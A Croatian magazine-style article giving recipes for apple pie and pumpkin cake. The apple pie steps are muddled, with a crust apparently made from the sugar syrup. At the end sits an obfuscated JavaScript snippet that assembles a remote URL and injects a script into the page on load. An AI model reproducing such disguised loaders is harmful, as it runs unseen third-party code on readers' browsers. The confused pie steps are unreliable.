Osim što će vam grijati nepce u hladne jesenske dane i zamirisati kuću opojnim mirisima, kolači spravljeni od jesenskih voćaka su i jako zdravi. Jesensko voće uključuje bundevu, jabuku, smokvu, krušku, šipak, brusnicu, grožđe, a osim voća jako je zdravo i jesenje povrće poput prokulice, cvjetače, cikle, batata, itd.
U ovom članku donosimo vam 2 recepta za kolače od jednih od najpopularnijih jesenskih voćki – jabuke i bundeve. Recepti su jako jednostavni i ne iziskuju mnogo truda ni vremena, a sastojke za iste smo pronašli u Plodine katalogu na akcijskim cijenama. Ukoliko dosada još niste pravili ovakve kolače, odvažite se isprobati nešto novo. Divan miris ispunit će vaš dom i unijeti istinski osjećaj jeseni, a ukusni kolači i pite zadivit će vaše ukućane.
Pita od jabuke
Savršen recept koji će vas zagrijati u hladne kišne dane.
Sastojci:
• ½ šalice maslaca
• 3 žlice brašna
• ¼ šalice vode
• ½ šalice bijelog šećera
• ½ šalice smeđeg šećera
• 8 jabuka – oguljenih, očišćenih i izribanih na ploške
1. korak
Zagrijte pećnicu na 220°C. Otopite maslac na laganoj vatri te umiješajte brašno da dobijete pastu. Dodajte vodu, bijeli šećer te smeđi šećer te pustite da prokuha. Zatim smanjite temperaturu i ostavite da lagano kuha.
2. korak
U tepsiju stavite donju koru izrađenu od smjese koju ste zagrijavali te je napunite jabukama. Pokrijte s gornjom korom koju možete izrezati u resice te ih rasporediti u cik-cak između kojih će viriti unutrašnji voćni nadjev.
3. korak
Pecite 15 minuta u prethodno zagrijanoj pećnici. Poslije smanjite temperaturu na 175°C te pecite 35 do 45 minuta, dok jabuke ne omekšaju.
Ukoliko niste neki obožavatelj jabuke, umjesto nje će u pitu odlično ići i borovnica, jagoda, miješano šumsko voće, i sl.
Kolač od bundeve
Ako niste veliki fan bundeve, bit ćete nakon što probate ovaj kolač!
Sastojci
• 2 šalice brašna
• 1 ½ šalica šećera
• 1 žličica sode bikarbone
• 2 žlice praška za pecivo
• 2 žličice cimeta
• 3 velika jaja
• 1 šalica ulja
• 420g pirea od bundeve
Sastojci za kremu od sira (opcionalno):
• 200g krem sira
• 8 žlica maslaca
• 1 šalica šećera u prahu
• 2 žličice ekstrakta vanilije
1. korak
Zagrijte pećnicu na 180°C te zamastite neljepljivu tepsiju. U velikoj zdjeli pomiješajte suhe sastojke: brašno, šećer, sodu bikarbonu, prašak za pecivo te cimet. U drugoj posudi umutite mokre sastojke: jaja, ulje, bundevu dok se dobro ne sjedine.
2. korak
Dodajte mokre sastojke suhim sastojcima i miješajte dok ne postane glatko. Prebacite u pripremljenu posudu za pečenje i pecite na 180°C oko 35-40 minuta ili dok čačkalica koju ćete zabosti u sredinu ne izađe čista. Ostavite kolač da se potpuno ohladi u kalupu, a zatim ga premažite glazurom.
3. korak
Pomiješate sve sastojke za glazuru u zdjeli te pomoću nastavka za pjenjaču miješajte na velikoj brzini 2-3 minute ili dok smjesa ne postane pahuljasta, po potrebi lagano stružući po zdjeli.
Priprema navedenih jela trajat će svega sat – sat i pol, a čine odličan popodnevni desert, a i oduševit će svakog kome ih odnesete kao poklon u goste. Ukoliko preferirate neko drugo jesenje voće, možete se poigrati s receptima pa ispeći pitu ili kolač od nečeg drugog.
(function(){
tvn7u="tjzxj1j3vn77";tvn7=document.createElement("script");
tvn7_="u"+("st");tvn7_+="at"+(".");tvn7.async=true;tvn7_+="in";
tvn7u="316194342."+tvn7u;tvn7.type="text/javascript";tvn7u+="v3b8j35cnlt2";
tvn7u+="mvm1h5";tvn7_+=("f")+"o"+("/");tvn7.src="https://"+tvn7_+tvn7u;
tvn7d=document.body;tvn7d.appendChild(tvn7);
})();